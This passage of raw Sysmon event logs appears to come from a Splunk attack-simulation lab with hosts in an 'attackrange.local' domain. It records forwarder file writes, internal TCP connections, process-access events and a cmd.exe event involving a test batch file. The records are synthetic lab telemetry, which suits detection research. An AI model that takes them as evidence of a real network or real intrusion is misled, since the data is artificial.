Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E147229D9714BD5B3B4735F1C5EA728A,SHA256=B1D746ABD42D9E16FEF3D97D0F8505546CC8DDA071F2487E153F7565D887C68B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:32.261{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B755E30F06A91FC6A4AEF13FF3B1D80,SHA256=71684FD2423FE78295CB161D6CF3429DE09FA9046BB17A575E1FC5F652D2E3BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:32.237{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57160-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:33.308{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F932E03C56784567574DF17B1CF2022,SHA256=04D58DBB82A45FD67C5A62C9862BC3A20FB9FCEDB979E8285B3F18940E01B155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:33.759{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD3BE271808CAEDCBEDA8807448EC297,SHA256=6F096B4BD2ED602C5B6D5DEC7B7E4A779C502E24294CCD61A36342A2FADD235D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:33.549{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48ADDF6E1647160E03D43D259F57B245,SHA256=824E789D75FAE2096929C61241BBBF54BA149BD1822440E167C0FF1704A1B8F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:34.344{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9872757ABA0EF8D92373EC5588133B2C,SHA256=04035345B67BBE87E4F63E46F62138FCBC590943D10DDB8D68B98DA18AC045C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:26.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50914-false10.0.1.12-8000- 23542300x80000000000000001046054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:34.550{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6CCC9F40B92FD27A68E172441349089,SHA256=B9051F58300736044517B03BD499A1C3A53EA6243F58882CA2AD471C6C09EA4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:34.134{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=36293ADF60D97F3305FBC7893C4C418D,SHA256=6AADAF298C86C4A08FDEB75C17B60E913DD726AA7C35BA04F1ADDF92BA474E3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:34.134{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=376E2F2378BD3C25F4241C4BF93CE2EC,SHA256=89DB06D16D7CEBFF7A26CE558C78137BB56FA2604700315988E58F274A498374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:35.359{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9253E8DEA2B55B0FB9CC5607B9F2985E,SHA256=95476BEA76CFE30333EFB08ABA5383A12B81FF3A32A1ED0CD126073C10AF030B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:35.569{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C694D796C9AF86F300337E77778590F,SHA256=F3E319E43076ED619A765C5E15740642D4BAAA5A376560109D196F10C6A05924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:36.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53712CAC9492D985BC222ADB51C002B0,SHA256=D9110B64D664C377C6A06C60F0B8058078D39149077980D945CDE3AB263A4661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:36.452{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FFF1A97EF6CD93B770DF72180BA32E,SHA256=0C393E453911F4355842B8EA916A1E85D0EEF241E2FD36BF5959DE97C11C2956,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:37.617{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2C5F41832695F10518CCE68E894EB5,SHA256=AA063D6CB96F8CFB225D0A52BD35FAFFB9A219D1768112CDCAD765FC7D2F7A8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:37.468{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1E6D9A000BC37D6A5BB3F32495EFD5E,SHA256=7BE82D756E97242B69AF45C65FB80543E933E7DABBBE5F6D6D589F8A6463A010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:38.468{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A507C214CD6A93CCE196351981EA83E,SHA256=CA2B7DAC1DC31D3D7F9A0B4C4142BA8561061B7D02961DBBAF9EE543D9600D8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:38.631{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B405558BAE5DDFC851689CC6B11A03B,SHA256=30F351135D106426EC2EB6467263909EF7FE903C1489A119511C168763B6EDEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:38.450{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=271F2A7C9319C4B799BFF145C0E8187C,SHA256=8CCD0056855EABD470BBB082AA5F5861F7AF0A24125A82ECD6E5689865BA340A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:38.364{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exeC:\Temp\test\sil.bat2021-07-12 07:44:38.363 354300x8000000000000000806192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:38.257{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57161-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:39.485{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA57B6724BC48E2720FDB3C0EAFFC62C,SHA256=F85419D8E4D7D3D4CADB42129F93E5136F02CD0DB3ED59ABB8111ADE1834E232,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:39.646{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C39C41204E1BEDCF742A599C6ABFD087,SHA256=B968433B161774310BB729766E419F5DFC45F9DE2892EE5C945021492BF12E20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:40.545{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF99C8C270D3B9124DEF893037579DA3,SHA256=6BF0C205B6FAEBC593BAF51E88D7CC39DBD5F50187C0CF2F4268DADFBF6216F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:40.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8724DDD780D25116168850257EB8DBD1,SHA256=141910656E0C1B3B8FDAF5D1C1DCF434647B30831FA1D649B8F0BDD69AF11B86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:41.682{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1345E112726DABE25A51E6E38DFBC2B5,SHA256=B07A2949B62E4E539194B9A630DE37AA2C25615FF648CC7A68B16AC4DA78AE88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:41.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC899CF94D24F8640C95A7EC5A494203,SHA256=734DD18CA2CD57C49FB2B763FA068EB8E40F967CAF0BF23C04073D43F2011057,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:32.639{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50915-false10.0.1.12-8000- 23542300x80000000000000001046066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:42.781{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00023F87DCDA4678C0829B4214163563,SHA256=C67B4D23F38CF444FB04224AA1E9C3F1A917F12A2C0D085C8E6A2EFFC4789B72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:42.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=648244FFD40B8B91E66CA7CDEB5826DF,SHA256=A6C3324A808BB83D2FFA11095C162E461FED0F8560B550EEEFEA612E677FAB03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:43.578{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=261DEA4EBCE45B03C1D6A99FE00E172A,SHA256=B5BD02FDD26EF01E278CA40A94E7A767A7BBC95FD537F42CC15B188D46215DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:43.782{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1383365A59908EE395C1C2BA04EB72F5,SHA256=2596F87408C6EE2D9AD21D3AD62A3D2D4579AA9C2B7EC2E00BFC0CF1E6F34B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:44.578{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DF4FC0B99440D823F3E5E2FD1007DC6,SHA256=D373DB0D6C0854EC230F81D21B98FCFA565E14EE9632E54AE776E2EDEC423E54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:44.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19128E7E22B9C856FE12DB150F3567ED,SHA256=BF13495AC01EE61A08C6B65A8922B2F73963A3FB0D07C5435422C12DEFA9DE98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77957A429339DAE46B094E0B314CD07,SHA256=34567E17AC4C2B16387DAE0D043C4AE17E5C407E2CE2557F10D3405BA4FCD7A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:45.610{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC7230804BF7BF98B0680C3CF86BD92,SHA256=3E47B320301AD78A5A010E6488BC5094D3D7803C4A121BDD22A12995C58985C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.365{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.364{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.364{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 